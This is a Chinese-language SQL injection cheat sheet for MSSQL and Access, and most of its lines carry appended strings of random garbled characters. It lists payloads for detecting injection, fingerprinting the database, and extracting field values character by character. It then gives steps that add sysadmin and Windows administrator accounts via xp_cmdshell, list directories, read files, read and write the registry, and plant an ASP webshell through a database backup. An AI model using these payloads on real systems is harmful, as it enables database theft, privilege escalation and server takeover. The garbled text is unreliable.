1.判断是否有注入;and 1=1 ;and 1=2 �Eb�M��G9
2.初步判断是否是mssql ;and user>0 b";D*\=�x�
taqmtXU=�(
3.注入参数是字符'and [查询条件] and ''=' Jpr`E&%I�6
/6nj
4.xxc
4.搜索时没过滤参数的'and [查询条件] and '%25'=' t{�o&$s�93
Zmz�YJ$:�6
5.判断数据库系统 y�v�t
�:/X
`;v>fTc�y
;and (select count(*) from sysobjects)>0 mssql J6J|&Z~UT,
4�8"=,I�rM
;and (select count(*) from msysobjects)>0 access {B)�-+0� 6
UQ.�DKU��g
�
���M�t
�
�y�3Lq"?h
6.猜数据库 ;and (select Count(*) from [数据库名])>0 @;g|sty�h^
3�FhkK/@��
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 0mY��KzJi�
�U�Y�`U[#�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 H�3S�fz�'�
0u�we,�; �
9.(1)猜字段的ascii值(access) ��Y0ouLUlI
*|^}=i�oj*
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �^>tq��g^
�o��.x<h";
(2)猜字段的ascii值(mssql) Nc[[o�>/Cb
IM*T+iRKqF
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �,'^^�OLez
j6r.�HYX!�
10.测试权限结构(mssql) I>(�-&YbC
�Lk:S��j�u
v���&}^8j
L__J(6,�V2
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �vu��=`s|R
Lzy �Ix!�S
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Y�o a|.2f
K��
f}h{�X
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- jp viX#\S_
�*$E�cP`K$
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- T�<S_�C$O�
���Mxk0XFA
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �k(��%h{0'
w;8V�D`>[|
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- E�;)7#3gY1
wh�)�Ujgd�
;and 1=(select IS_MEMBER('db_owner'));-- 4��Up���\_
0VwmV_6'<W
;�1Zz-��@�
��n|Smy\0�
11.添加mssql和系统的帐户 !�a<�}Mpeg
0w<G)p~%n�
;exec master.dbo.sp_addlogin username;-- 9#�D?wR#J=
;exec master.dbo.sp_password null,username,password;-- oH�]���"F�
�a+#A�itd�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �yjB.-o('�
�D�qbU$jt`
;exec master.dbo.xp_cmdshell 'net user username password f<�}>*xH/k
!K5��D�:x�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- i\94e{uty[
Y�pwMfl��4
;exec master.dbo.xp_cmdshell 'net user username password /add';-- LG>��lj$hO
-��na�o��M
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �<[w>Mbqj_
�n1
k�h8�,
9&7�$oI$!J
hB �36o9|9
12.(1)遍历目录 J sc`^a%`'
-]e@F��N�L
;create table dirs(paths varchar(100), id int) '>0rp\jC��
�>+����E
�
;insert dirs exec master.dbo.xp_dirtree 'c:\' `6B����jNV
�'X{J~fEI!
;and (select top 1 paths from dirs)>0 "��j] r���
�O0cKmh6�=
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) t)�h{ w"v
6}S�1um4 F
+!9��&zYu!
�jg+q�{ �^
(2)遍历目录 }"o,j>I��P
1KWGQJ%�%s
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- UKf�poDhEe
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 A<|]�>[ax
3IHA+���Zz
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �l
d���@�B
]5`Y�^hS_g
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 .W1i3Z�6g�
( V^C7i�x:
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 b am*&E%0K
}!n�90
9�L
/\C�5`>x��
?�> 7SZiC`
13.mssql中的存储过程 oNK-^N�?-T
B`1"4[�{�
xp_regenumvalues 注册表根键, 子键 "{Jq6)�:mp
������ZX�L
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �pR*)\�@ma
P@pJ^5Jf�
xp_regread 根键,子键,键值名 3El�5g�0'G
JC}oc M
j0
;exec xp_regread b�X�*c-r:
�ji�����:E
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 wS%�aN@ay3
$`O%bsjX�
xp_regwrite 根键,子键, 值名, 值类型, 值 >y7|@'V[v0
DS]C�`aM9�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �"F��fIq�;
=p29�}^@@t
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 l
S ���m7i
��8�M�9}os
xp_regdeletevalue 根键,子键,值名 $yY\���[C�
Y�]-7T-*+t
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 +�r�c�DA|�
b2p;-rv�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 >t �L�l|O+
Pe<}kS
m�4
g�� �(:%�E
c�[��RkiV3
14.mssql的backup创建webshell _�(.,<�R�5
uxs�fQ%3`#
use model >L�{s[pL�J
_�}RzJKl@
create table cmd(str image); 8�R;A�5o,
� Mu?hB{o1
insert into cmd(str) values (''); t3b64J�[A{
��F^bzE5�#
backup database model to disk='c:\l.asp'; &�9:���"X�
�}W)c-91�
�k,�Uez�uV
'4J]��;Nj0
15.mssql内置函数 X
\GB�:#:X
r|�W�2I�,P
;and (select @@version)>0 获得Windows的版本号 5�o�P�3��1
�:2_8.+�:�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 2��&H�n%q)
�6}aH>(3!A
;and (select user_name())>0 爆当前系统的连接用户 �d�5�z?QI
S+7:�fu2?+
;and (select db_name())>0 得到当前连接的数据库 eO?.8OM-�a
5C&]YT3��)
A0>u9Bn"Qw
a�O���'�lk
16.简洁的webshell JE$aYs<(TF
9=w�t9` �?
use model j4�hi�MI�;
ds�9�L4zfO
create table cmd(str image); /�Q�8glLnM
�vn0}l6n3s
insert into cmd(str) values (''); +>��,4d���
@=kDaPme92
backup database model to disk='g:\wwwtest\l.asp';
